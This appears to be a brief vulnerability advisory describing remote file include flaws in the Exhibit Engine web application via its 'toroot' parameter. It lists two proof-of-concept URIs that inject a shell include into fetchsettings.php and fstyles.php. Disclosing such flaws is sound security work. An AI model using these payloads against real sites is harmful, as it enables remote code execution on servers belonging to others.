Exhibit Engine Toroot Parameter Multiple Remote File Include Vulnerabilities

Exhibit Engine Toroot Parameter Multiple Remote File Include Vulnerabilities

An attacker may exploit these issues using a web client.

The following proof-of-concept URIs are available:

http://www.example.com/fetchsettings.php?toroot=shell
http://www.example.com/fstyles.php?toroot=shell